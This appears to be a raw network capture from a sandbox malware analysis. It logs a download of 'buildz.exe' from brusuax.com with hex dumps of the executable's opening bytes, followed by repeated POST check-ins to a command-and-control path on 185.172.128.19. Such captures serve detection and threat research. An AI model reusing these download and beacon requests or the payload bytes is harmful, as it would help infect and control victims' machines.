Dec 20, 2023 15:35:16.418806076 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:16.036474943 CET	74	OUT	GET /dl/buildz.exe HTTP/1.1 Host: brusuax.com Connection: Keep-Alive
Dec 20, 2023 15:35:17.214818954 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:16 GMT Content-Type: application/octet-stream Content-Length: 769536 Last-Modified: Wed, 20 Dec 2023 14:30:02 GMT Connection: close ETag: "6582fa6a-bbe00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 f0 cd ba 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 09 00 00 02 44 00 00 00 00 00 a5 3e 00 00 00 10 00 00 00 00 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4d 00 00 04 00 00 30 9e 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 2b 0a 00 78 00 00 00 00 50 4c 00 40 7b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 1e 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 22 ee 09 00 00 10 00 00 00 f0 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 34 00 00 00 00 0a 00 00 36 00 00 00 f4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 06 42 00 00 40 0a 00 00 18 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 7b 01 00 00 50 4c 00 00 7c 01 00 00 42 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELbD>@M0(+xPL@{@.text" `.rdata46@@.data\|B@*@.rsrc@{PL\|B@@
Dec 20, 2023 15:35:17.214838028 CET	1286	IN	Data Raw: 55 8b ec 56 8d 45 08 50 8b f1 e8 36 2a 00 00 c7 06 24 02 4a 00 8b c6 5e 5d c2 04 00 cc cc cc cc c7 01 24 02 4a 00 e9 e7 2a 00 00 cc cc cc cc cc 55 8b ec 56 8b f1 e8 e5 ff ff ff f6 45 08 01 74 09 56 e8 29 2b 00 00 83 c4 04 8b c6 5e 5d c2 04 00 cc Data Ascii: UVEP6$J^]$JUVEtV)+^]UEQRUQR+]UEQRUQR?)]ffhJ*UPEV]UPEV]
Dec 20, 2023 15:35:17.560285091 CET	1286	IN	Data Raw: 8c 00 8b 0d 74 34 8c 00 c1 e8 03 81 ec 1c 08 00 00 85 c0 0f 86 ca 00 00 00 53 8b 1d b8 00 4a 00 56 8b 35 4c 00 4a 00 57 8b 3d b0 00 4a 00 89 4d fc 89 45 f8 8d 9b 00 00 00 00 81 3d 20 45 8c 00 59 09 00 00 0f 85 7f 00 00 00 6a 00 6a 00 ff d6 6a 00 Data Ascii: t4SJV5LJW=JME= EYjjjjjjPjhpJjjj@JjJjjhJhJjPJ3PPMQPEEEEETJjjjjjjhJJUR8EmZ_^[]UQE
Dec 20, 2023 15:35:17.560353994 CET	1286	IN	Data Raw: c3 cc cc cc 6a 00 6a 01 e8 b7 0a 00 00 c3 cc cc cc cc cc cc 56 8b f1 8b 4e 38 c7 06 4c 1e 4a 00 85 c9 74 07 6a 01 e8 39 0a 00 00 8d 4e 04 5e e9 51 1a 00 00 e8 3b f7 ff ff c2 04 00 cc cc cc cc cc cc cc cc e8 2b f7 ff ff c2 04 00 cc cc cc cc cc cc Data Ascii: jjVN8LJtj9N^Q;+3UVPWEUE}t_^]_^]UU@RUjR]UVW}3M
Dec 20, 2023 15:35:17.560369015 CET	1286	IN	Data Raw: 8b 45 fc 8b d1 03 fb 8b ce e8 b0 07 00 00 f6 46 40 04 74 09 8b 45 f8 33 d2 8b f8 eb 1a 8b c6 e8 da 06 00 00 8b f8 8b c6 47 e8 b0 06 00 00 8b d0 8b c7 8b 7d f8 03 d3 8b ce e8 f0 06 00 00 8b 5d f4 f6 46 40 01 74 0d 8b 4d f0 53 51 8d 4e 44 e8 da 05 Data Ascii: EF@tE3G}]F@tMSQNDN@E_E^[]UVWO@';UE}u'EnEJEuF@uC
Dec 20, 2023 15:35:17.560383081 CET	1286	IN	Data Raw: 00 eb 02 8b fb 8b 75 08 8b cf 8b c6 e8 17 04 00 00 5f 8b c6 5e 5b 8b e5 5d c2 20 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 e8 d5 f5 ff ff f6 45 08 01 74 09 56 e8 19 17 00 00 83 c4 04 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc Data Ascii: u_^[] UVEtV^]UVEtV^]UVEtV^]U}S]Vt(~r"FW8vSWjPFF@PW9_S
Dec 20, 2023 15:35:17.894723892 CET	1286	IN	Data Raw: 68 0c 1d 4a 00 52 8b c3 e8 65 01 00 00 8b f0 e8 3e 03 00 00 8b f7 8b c3 e8 15 00 00 00 5f 5e 8b c3 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 c7 45 fc 00 00 00 00 89 70 14 e8 2d 01 00 00 8d 14 70 8d 45 fc e8 32 e7 ff ff 8b e5 Data Ascii: hJRe>_^[UQEp-pE2]PYUSVW}L;s<E+;s;]u73_^[]6t(EWKpPQc
Dec 20, 2023 15:35:17.894747019 CET	1286	IN	Data Raw: be 80 56 4a 00 56 e8 d0 08 00 00 83 c6 18 81 fe e0 56 4a 00 59 7c ee 5e c3 8b ff 55 8b ec 8b 45 08 83 f8 04 56 8b f1 89 06 7d 0f 6b c0 18 05 80 56 4a 00 50 e8 b2 08 00 00 59 8b c6 5e 5d c2 04 00 8b 01 83 f8 04 7d 0f 6b c0 18 05 80 56 4a 00 50 e8 Data Ascii: VJVVJY\|^UEV}kVJPY^]}kVJPYUuuuuEE]U}Vt+qAr9UrrI;Mv2^]Uuuuu2]Uuuuus]UQu
Dec 20, 2023 15:35:17.895062923 CET	1286	IN	Data Raw: 45 0c 83 c4 10 50 8b ce e8 29 f5 ff ff 5f 5b 8b c6 5e 5d c2 08 00 8b ff 55 8b ec 53 8b 5d 0c 56 57 8b 7d 08 8b 47 14 8b f1 3b c3 73 05 e8 3c ff ff ff 2b c3 89 45 08 8b 45 10 3b 45 08 73 03 89 45 08 3b f7 75 19 8b 45 08 6a ff 03 c3 50 e8 53 ff ff Data Ascii: EP)_[^]US]VW}G;s<+EE;EsE;uEjPSSjIFjut8rNrFFuWQPLu_^[]UVjFrjjuD^]j\Iu}W
Dec 20, 2023 15:35:17.895112038 CET	1286	IN	Data Raw: 8b 40 fc 6a 50 89 85 e4 fd ff ff 8d 85 d8 fc ff ff 6a 00 50 e8 f7 13 00 00 8d 85 d8 fc ff ff 83 c4 0c 89 85 28 fd ff ff 8d 85 30 fd ff ff 6a 00 c7 85 d8 fc ff ff 15 00 00 40 89 b5 e4 fc ff ff 89 85 2c fd ff ff ff 15 ec 00 4a 00 8d 85 28 fd ff ff Data Ascii: @jPjP(0j@,J(PJj UEVFuc!FHlHhN;(HJt@GJHpuF;HFJtF@GJHpuFF@puHpF@F^]U(B
Dec 20, 2023 15:35:17.895159960 CET	1286	IN	Data Raw: 89 75 fc 8d 45 98 50 ff 15 f0 00 4a 00 6a fe 5f 89 7d fc b8 4d 5a 00 00 66 39 05 00 00 40 00 75 38 a1 3c 00 40 00 81 b8 00 00 40 00 50 45 00 00 75 27 b9 0b 01 00 00 66 39 88 18 00 40 00 75 19 83 b8 74 00 40 00 0e 76 10 33 c9 39 b0 e8 00 40 00 0f Data Ascii: uEPJj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CS5AYujXYujGY@]j>}jYYS>xF=pWJ:=}j4Y:}j#YSY;tPY:]tM

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:16.862236977 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:17.154694080 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:17.177691936 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:17.484209061 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:17.917320013 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:18.220467091 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:18.285566092 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:18.589207888 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:19.034070015 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:19.337908030 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:19.366101980 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:19.671652079 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:20.099179983 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:20.388364077 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:20.413923979 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:20.704792976 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:21.146970987 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:21.435915947 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:21.456983089 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:21.769694090 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:22.181269884 CET	156	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2023 15:35:22.472547054 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 130
Dec 20, 2023 15:35:22.566649914 CET	308	OUT	POST /ghsdh39s/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 46 43 38 32 32 30 37 32 34 43 45 44 43 43 46 32 36 35 32 38 30 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 44 43 45 46 42 31 35 41 31 44 43 45 41 46 34 41 43 38 33 33 30 43 33 31 34 30 32 30 42 34 42 35 43 39 33 39 42 31 36 39 46 35 42 32 42 36 44 43 36 41 39 35 35 32 35 38 45 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7FC8220724CEDCCF265280BD66259586F0F21EA74869AC58983B504DCEFB15A1DCEAF4AC8330C314020B4B5C939B169F5B2B6DC6A955258E
Dec 20, 2023 15:35:22.869270086 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0